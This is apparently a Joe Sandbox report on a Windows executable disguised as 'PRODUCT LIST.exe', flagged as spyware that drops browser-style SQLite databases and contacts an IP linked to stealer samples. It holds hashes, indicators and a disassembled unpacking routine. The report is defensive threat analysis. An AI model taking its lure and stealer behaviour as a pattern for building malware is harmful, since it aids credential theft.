http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.dr | false | | high
https://api.ipify.orgcoo | PRODUCT LIST.exe | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/actor/next | PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.219.234.170 | unknown | United States | | 27176 | DATAWAGONUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561829
Start date and time: 2024-11-24 11:48:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PRODUCT LIST.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/39@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 59%
• Number of executed functions: 93
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
• Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: PRODUCT LIST.exe
Time | Type | Description
05:49:13 | API Interceptor | 42x Sleep call for process: PRODUCT LIST.exe modified

No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
DATAWAGONUS | Zoom.exe | malicious | Unknown | 172.81.130.139
DATAWAGONUS | Zoom.exe | malicious | PureCrypter, MicroClip | 172.81.130.139
DATAWAGONUS | Payload 94.75 (3).225.exe | malicious | Unknown | 172.81.131.156
DATAWAGONUS | mpsl.elf | malicious | Unknown | 104.224.1.68
DATAWAGONUS | b39wW3jYKO.exe | malicious | StormKitty, XWorm | 104.219.239.11
DATAWAGONUS | http://104.219.233.181/fwd/P2Q9MjU2Mjc5JmVpPTcyODUyMjcyJmlmPTUxNDQyJm5kcD03OTgzJnNpPTE3JmxpPTIyMzczGet | malicious | Phisher | 104.219.233.181
DATAWAGONUS | https://burnlyinvestments.co.ke/images/ | malicious | Unknown | 104.219.239.67
DATAWAGONUS | YjYoFznWQI.rtf | malicious | FormBook, PureLog Stealer | 104.219.239.104
DATAWAGONUS | R.F.Q. 93-2024.xls | malicious | FormBook, PureLog Stealer | 104.219.239.104
DATAWAGONUS | R.F.Q. 93-2024.xls | malicious | FormBook | 104.219.239.104

No context
Process: C:\Users\user\Desktop\PRODUCT LIST.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2666
Entropy (8bit): 5.345804351520589
Encrypted: false
SSDEEP: 48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpH8HKx1qHxLU:vq5qxqdqolqztYqh3oPtI6mq7qoT5JcE
MD5: 7ADCF08EB89A57934E566936815936CF
SHA1: C164331AA17656919323F4464BC1FC1EB1B8CA90
SHA-256: 848A610C0FC09EF83A3DFC86A453C9B6F81DAA2A89779529254577F818E68933
SHA-512: 54EB0F3313760BC4C88C736C5CE57B1890BBCD00376445B3BFC3BB17C6ACBCE22700491D96B6E7E926892555B2AC0C62F0C31557F0E00C00EA38D225228212D3
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
Process: C:\Users\user\Desktop\PRODUCT LIST.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136413900497188
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5: 429F49156428FD53EB06FC82088FD324
SHA1: 560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256: 9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512: 1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious: false
Reputation: high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):51200
                                                                                      Entropy (8bit):0.8746135976761988
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\PRODUCT LIST.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3 (binary; non-printable bytes not shown)
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.121297215059106
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):0.08235737944063153
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\PRODUCT LIST.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.136413900497188
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                      Malicious:false
Preview:SQLite format 3 (binary file header; non-printable bytes omitted)
                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.94563762416441
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:PRODUCT LIST.exe
                                                                                      File size:1'776'640 bytes
                                                                                      MD5:a9b805862ccee6848ce91ef51a31f71d
                                                                                      SHA1:4ca749b30f879945324811f5924996765aa7d2e4
                                                                                      SHA256:9bdef064f9693bbae4a073b09a795c7b27e7486c10b3c7d920019ca3729bb434
                                                                                      SHA512:94b6cc887127129a3b51dd68b8d29e417a70e7538668f5bfb4d5e1769d74e2ce44dcef9f36ab6021e04fb1e78f710bcc859163e064d91793e5a3b756fe067d97
                                                                                      SSDEEP:24576:DRhMoSwfXo0P9Ej+zE2bb1SfyeeYF2yjfLV/JFzQXYiU4L/E/pWWG8WHHSx44s8/:DgNwfevYoaTerPtsYikWWG8GJ88Y6eb
                                                                                      TLSH:188533812523D06DD1FB083240BA2A2FFF5FBB104BA1A699EB4E55055B3ED5D4633E38
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t............@.. ........@.. .......................@[...........@................................
                                                                                      Icon Hash:00928e8e8686b000
                                                                                      Entrypoint:0x80e0b0
                                                                                      Entrypoint Section:.boot
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows cui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:4328f7206db519cd4e82283211d98e83
                                                                                      Instruction
                                                                                      call 00007FE614BE0420h
                                                                                      push ebx
                                                                                      mov ebx, esp
                                                                                      push ebx
                                                                                      mov esi, dword ptr [ebx+08h]
                                                                                      mov edi, dword ptr [ebx+10h]
                                                                                      cld
                                                                                      mov dl, 80h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE02BCh
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE0323h
                                                                                      xor eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jnc 00007FE614BE03B7h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      je 00007FE614BE02DAh
                                                                                      push edi
                                                                                      mov eax, eax
                                                                                      sub edi, eax
                                                                                      mov al, byte ptr [edi]
                                                                                      pop edi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      mov ebx, 00000002h
                                                                                      jmp 00007FE614BE026Bh
                                                                                      mov eax, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc eax, eax
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007FE614BE02BCh
                                                                                      sub eax, ebx
                                                                                      mov ebx, 00000001h
                                                                                      jne 00007FE614BE02FAh
                                                                                      mov ecx, 00000001h
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      adc ecx, ecx
                                                                                      add dl, dl
                                                                                      jne 00007FE614BE02D7h
                                                                                      mov dl, byte ptr [esi]
                                                                                      inc esi
                                                                                      adc dl, dl
                                                                                      jc 00007FE614BE02BCh
                                                                                      push esi
                                                                                      mov esi, edi
                                                                                      sub esi, ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2203a | 0x50 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0x4e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
